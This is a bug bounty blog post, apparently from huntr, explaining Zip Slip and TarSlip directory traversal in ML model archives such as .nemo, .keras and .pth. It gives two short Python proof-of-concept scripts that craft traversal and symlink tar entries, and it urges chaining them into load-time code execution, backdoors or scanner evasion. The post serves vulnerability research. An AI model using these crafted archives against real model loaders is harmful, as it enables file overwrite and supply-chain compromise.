Many ML model files— .nemo, .keras, .gguf, even trusty .pth— are just zip/tar archives in disguise. Feed one to a loader that blindly calls extractall()and pow, you’ve opened the door to an archive-slip (Zip Slip, TarSlip) directory-traversal bug.
Although huntr’s scanner now grabs the easy catches—the classic ../../etc/passwd or stray symlink—a smart variation on the same primitive can still score a bounty.
So why talk about archive slip at all? Because it’s still the easiest first hop toward higher-value goals—like load-time ACEs. Below we recap two real MFVs that relied on TarSlip and then show where today’s payouts really are.🔎
The Vulnerability Explained
When code unpacks an archive without validating each member’s final write path, attackers can:
- Path-traverse with
../sequences or absolute paths. - Abuse symlinks so an innocent-looking folder entry actually points outside the sandbox.
Model formats—.nemo, .keras, .pth, even many .onnx bundles—are just tar/zip files under a fancy extension. One-liner APIs (model.from_pretrained()) hide the extraction step, so sloppy extraction slips in unnoticed.
Two Classic PoCs
(Framework names redacted; focus on the pattern.)
Path-Traversal Demo
import tarfile
def escape(member):
member.name = "../../tmp/hacked" # break out of the extract dir
return member
with tarfile.open("traversal_demo.model", "w:gz") as tf:
tf.add("harmless.txt", filter=escape)
Any loader that does a raw extractall() will drop /tmp/hacked on disk.
Symlink Demo (beats naive path filters)
import tarfile, pathlib
TARGET = "/tmp" # where the payload will land
PAYLOAD = "abc/hacked"
def link_it(member):
member.type, member.linkname = tarfile.SYMTYPE, TARGET
return member
with tarfile.open("symlink_demo.model", "w:gz") as tf:
tf.add(pathlib.Path(PAYLOAD).parent, filter=link_it)
tf.add(PAYLOAD) # rides the symlink
Even loaders that strip ../ often forget to block symlink entries.
Why Archive Slip Still Matters
Write-anywhere is a perfect pivot to overwrite config files or plant second-stage payloads.
DIY loaders are everywhere in research repos; they use extractall() or extract() behind the scenes.
Supply-chain impact: one poisoned model hub entry can compromise countless CI pipelines.
Where the Bounty Money Really Is
High Value | Medium → Low |
✔ | ✔ |
✔ Code execution at load time via header/metadata abuse | ✔ Zip/TarSlip traversal |
✔ Backdoors or output manipulation | ✔ Bugs that fire only after extra imports |
✔ Tricks that evade our scanners (nested, encrypted, obfuscated) | ✔ DoS via oversized tensors |
Current reward tiers are posted on the bounties page; bigger impact + high-value format = bigger payout.
Wrapping Up
Archive-slip by itself is basically dead for bounty purposes—but it’s still the quickest way to get a write-anywhere primitive. Chain that primitive into load-time code execution, model-file backdoors & output tampering, or scanner evasion, and you’re solidly in high-value MFV territory.
Focus on extraction and deserialization paths, especially in high-value formats like .safetensors, .gguf, .keras, and .joblib. Show us something the scanner can’t see, and the bounty is yours.
Think you’ve got one? Submit your MFV—and happy hunting! 🤘